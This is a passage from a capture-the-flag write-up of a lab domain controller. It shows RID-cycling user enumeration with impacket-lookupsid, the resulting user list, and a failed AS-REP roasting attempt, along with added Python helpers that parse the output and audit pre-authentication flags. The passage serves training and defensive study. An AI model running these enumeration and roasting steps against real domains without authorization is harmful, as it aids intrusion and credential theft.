RID Cycling


┌──(kali㉿kali)-[~/archive/htb/labs/support]
└─$ impacket-lookupsid support.htb/blahblah@dc.support.htb 100000 
Impacket v0.11.0 - Copyright 2023 Fortra
 
password:
[*] Brute forcing SIDs at dc.support.htb
[*] stringbinding ncacn_np:dc.support.htb[\pipe\lsarpc]
[*] domain sid is: S-1-5-21-1677581083-3380853377-188903654
498: SUPPORT\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: SUPPORT\Administrator (SidTypeUser)
501: SUPPORT\Guest (SidTypeUser)
502: SUPPORT\krbtgt (SidTypeUser)
512: SUPPORT\Domain Admins (SidTypeGroup)
513: SUPPORT\Domain Users (SidTypeGroup)
514: SUPPORT\Domain Guests (SidTypeGroup)
515: SUPPORT\Domain Computers (SidTypeGroup)
516: SUPPORT\Domain Controllers (SidTypeGroup)
517: SUPPORT\Cert Publishers (SidTypeAlias)
518: SUPPORT\Schema Admins (SidTypeGroup)
519: SUPPORT\Enterprise Admins (SidTypeGroup)
520: SUPPORT\Group Policy Creator Owners (SidTypeGroup)
521: SUPPORT\Read-only Domain Controllers (SidTypeGroup)
522: SUPPORT\Cloneable Domain Controllers (SidTypeGroup)
525: SUPPORT\Protected Users (SidTypeGroup)
526: SUPPORT\Key Admins (SidTypeGroup)
527: SUPPORT\Enterprise Key Admins (SidTypeGroup)
553: SUPPORT\RAS and IAS Servers (SidTypeAlias)
571: SUPPORT\Allowed RODC Password Replication Group (SidTypeAlias)
572: SUPPORT\Denied RODC Password Replication Group (SidTypeAlias)
1000: SUPPORT\DC$ (SidTypeUser)
1101: SUPPORT\DnsAdmins (SidTypeAlias)
1102: SUPPORT\DnsUpdateProxy (SidTypeGroup)
1103: SUPPORT\Shared Support Accounts (SidTypeGroup)
1104: SUPPORT\ldap (SidTypeUser)
1105: SUPPORT\support (SidTypeUser)
1106: SUPPORT\smith.rosario (SidTypeUser)
1107: SUPPORT\hernandez.stanley (SidTypeUser)
1108: SUPPORT\wilson.shelby (SidTypeUser)
1109: SUPPORT\anderson.damian (SidTypeUser)
1110: SUPPORT\thomas.raphael (SidTypeUser)
1111: SUPPORT\levine.leopoldo (SidTypeUser)
1112: SUPPORT\raven.clifton (SidTypeUser)
1113: SUPPORT\bardot.mary (SidTypeUser)
1114: SUPPORT\cromwell.gerard (SidTypeUser)
1115: SUPPORT\monroe.david (SidTypeUser)
1116: SUPPORT\west.laura (SidTypeUser)
1117: SUPPORT\langley.lucy (SidTypeUser)
1118: SUPPORT\daughtler.mabel (SidTypeUser)
1119: SUPPORT\stoll.rachelle (SidTypeUser)
1120: SUPPORT\ford.victoria (SidTypeUser)
2601: SUPPORT\MANAGEMENT$ (SidTypeUser)

Performing the RID cycling attack against the target's SMB service with an arbitrary username (blahblah) found the following domain users:

  • Administrator
  • Guest
  • krbtgt
  • DC$
  • MANAGEMENT$
  • ldap
  • support
  • smith.rosario
  • hernandez.stanley
  • wilson.shelby
  • anderson.damian
  • thomas.raphael
  • levine.leopoldo
  • raven.clifton
  • bardot.mary
  • cromwell.gerard
  • monroe.david
  • west.laura
  • langley.lucy
  • daughtler.mabel
  • stoll.rachelle
  • ford.victoria

Finding the domain users above helps with moving forward. It is also worth noting that the usernames suggest the target domain uses the following naming convention: <LASTNAME>.<FIRSTNAME>

┌──(kali㉿kali)-[~/archive/htb/labs/support]
└─$ wc -l users.txt 
22 users.txt

I have saved those domain users to a file: users.txt

Moreover, while the naming convention could be leveraged to further enumerate domain users (if any remain), I will work with the users already found for now, since the number is sufficient.
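As an added example (not part of the original writeup), here is a small Python helper that parses the impacket-lookupsid output above into structured entries, rebuilds each object's full SID from the domain SID plus RID (which is exactly what a RID-cycling sweep asks LSARPC to resolve, one LsarLookupSids call at a time), separates user accounts from groups, aliases and machine accounts to build a users.txt, and checks the <LASTNAME>.<FIRSTNAME> convention. The sample input is a constructed subset of the output shown above; the function and regex names are my own.

```python
import re

# Constructed sample: a subset of the impacket-lookupsid output shown above.
LOOKUPSID_OUTPUT = """\
[*] Brute forcing SIDs at dc.support.htb
[*] stringbinding ncacn_np:dc.support.htb[\\pipe\\lsarpc]
[*] domain sid is: S-1-5-21-1677581083-3380853377-188903654
500: SUPPORT\\Administrator (SidTypeUser)
512: SUPPORT\\Domain Admins (SidTypeGroup)
1000: SUPPORT\\DC$ (SidTypeUser)
1101: SUPPORT\\DnsAdmins (SidTypeAlias)
1106: SUPPORT\\smith.rosario (SidTypeUser)
2601: SUPPORT\\MANAGEMENT$ (SidTypeUser)
"""

DOMAIN_SID_RE = re.compile(r"domain sid is: (S-1-5-21-\d+-\d+-\d+)")
# "<rid>: <DOMAIN>\<name> (<SidType...>)"; names may contain spaces.
ENTRY_RE = re.compile(r"^(\d+): ([^\\]+)\\(.+) \((SidType\w+)\)$")
# The <lastname>.<firstname> convention observed in the resolved users.
NAMING_RE = re.compile(r"^[a-z]+\.[a-z]+$")


def parse_lookupsid(text):
    """Return (domain_sid, entries); each entry carries rid, domain, name, type
    and the full SID, which is the domain SID with the RID appended."""
    domain_sid = None
    entries = []
    for line in text.splitlines():
        m = DOMAIN_SID_RE.search(line)
        if m:
            domain_sid = m.group(1)
            continue
        m = ENTRY_RE.match(line)
        if m and domain_sid:
            rid = int(m.group(1))
            entries.append({
                "rid": rid,
                "domain": m.group(2),
                "name": m.group(3),
                "type": m.group(4),
                "sid": f"{domain_sid}-{rid}",
            })
    return domain_sid, entries


def user_accounts(entries, include_machines=False):
    """Names of SidTypeUser entries; machine accounts end with '$' and are
    dropped unless requested, since they are not candidates for a user list."""
    return [
        e["name"] for e in entries
        if e["type"] == "SidTypeUser"
        and (include_machines or not e["name"].endswith("$"))
    ]


def follows_naming_convention(name):
    """True when a name matches the <LASTNAME>.<FIRSTNAME> pattern."""
    return bool(NAMING_RE.match(name))


def candidate_sids(domain_sid, start, stop):
    """The SIDs a RID-cycling sweep over [start, stop) would ask the DC to
    resolve; on the DC side this shows up as repeated LSARPC lookups over
    \\pipe\\lsarpc from a single low-privilege session."""
    return [f"{domain_sid}-{rid}" for rid in range(start, stop)]


if __name__ == "__main__":
    dsid, found = parse_lookupsid(LOOKUPSID_OUTPUT)
    print("domain SID:", dsid)
    for e in found:
        tag = "matches convention" if follows_naming_convention(e["name"]) else ""
        print(f'{e["sid"]}  {e["type"]:<13} {e["name"]} {tag}')
    print("users.txt content:", user_accounts(found))
```

The users.txt list produced here drops DC$ and MANAGEMENT$ by default; pass include_machines=True to keep them, as the writeup's own 22-line file does.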

ASREPRoasting Fail


┌──(kali㉿kali)-[~/archive/htb/labs/support]
└─$ impacket-GetNPUsers support.htb/ -dc-ip $IP -usersfile users.txt
Impacket v0.11.0 - Copyright 2023 Fortra
 
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User DC$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User MANAGEMENT$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ldap doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User support doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User smith.rosario doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User hernandez.stanley doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User wilson.shelby doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User anderson.damian doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User thomas.raphael doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User levine.leopoldo doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User raven.clifton doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User bardot.mary doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User cromwell.gerard doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User monroe.david doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User west.laura doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User langley.lucy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User daughtler.mabel doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User stoll.rachelle doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ford.victoria doesn't have UF_DONT_REQUIRE_PREAUTH set

None of the found users have DONT_REQ_PREAUTH set, so I will need to look elsewhere to move forward.
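Added example, not from the original writeup: a Python snippet that pairs the GetNPUsers result above with the check a defender would run on the LDAP side. The first part classifies each user from users.txt by what the KDC reported for it; mapping the unnamed KDC_ERR_CLIENT_REVOKED line to its user by position assumes GetNPUsers reports users in usersfile order, which is how the output above reads (the KDC returns that error for a disabled account, which is why it lands at krbtgt's position). The second part evaluates a userAccountControl value against the UF_DONT_REQUIRE_PREAUTH bit (0x400000) that GetNPUsers tests for and shows the corrected value with the bit cleared. The sample output lines and UAC values are constructed; the $krb5asrep$ line format is the one GetNPUsers emits for an account that does not require pre-authentication.

```python
import re

# userAccountControl bits (Microsoft-documented values).
UF_ACCOUNTDISABLE = 0x0002
UF_NORMAL_ACCOUNT = 0x0200
UF_DONT_REQUIRE_PREAUTH = 0x400000

# Constructed sample in the format of the impacket-GetNPUsers output above,
# for a users.txt containing Administrator, krbtgt, ldap, svc_example.
GETNPUSERS_OUTPUT = """\
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User ldap doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$svc_example@SUPPORT.HTB:0123456789abcdef$constructedsample
"""

NO_PREAUTH_RE = re.compile(r"User (\S+) doesn't have UF_DONT_REQUIRE_PREAUTH set")
KDC_ERROR_RE = re.compile(r"Kerberos SessionError: (KDC_ERR_\w+)")
ASREP_RE = re.compile(r"^\$krb5asrep\$\d+\$([^@]+)@")


def classify_output(text, users):
    """Map each username (usersfile order) to the status GetNPUsers reported.
    Error lines do not name the user, so they are matched by position."""
    statuses = {}
    pos = 0
    for line in text.splitlines():
        m = NO_PREAUTH_RE.search(line)
        if m:
            statuses[m.group(1)] = "preauth required"
            pos += 1
            continue
        m = ASREP_RE.match(line)
        if m:
            statuses[m.group(1)] = "roastable (preauth not required)"
            pos += 1
            continue
        m = KDC_ERROR_RE.search(line)
        if m and pos < len(users):
            statuses[users[pos]] = m.group(1)
            pos += 1
    return statuses


def audit_uac(uac):
    """Findings for one account's userAccountControl value, as an LDAP-side
    audit would produce them before anyone runs GetNPUsers."""
    findings = []
    if uac & UF_DONT_REQUIRE_PREAUTH:
        findings.append("preauth not required (AS-REP roastable)")
    if uac & UF_ACCOUNTDISABLE:
        findings.append("disabled")
    return findings


def clear_no_preauth(uac):
    """Corrected userAccountControl: the same flags with pre-auth enforced."""
    return uac & ~UF_DONT_REQUIRE_PREAUTH


if __name__ == "__main__":
    users = ["Administrator", "krbtgt", "ldap", "svc_example"]
    for user, status in classify_output(GETNPUSERS_OUTPUT, users).items():
        print(f"{user:<15} {status}")
    # Constructed UAC values: krbtgt disabled, svc_example with preauth off.
    for name, uac in {"krbtgt": 0x202, "smith.rosario": 0x200, "svc_example": 0x410200}.items():
        print(f"{name:<15} 0x{uac:x} -> {audit_uac(uac) or ['ok']}"
              f"  fixed: 0x{clear_no_preauth(uac):x}")
```

On the directory side the equivalent query is a filter on userAccountControl with the 0x400000 bit set; any account it returns is the one GetNPUsers would have produced a hash for.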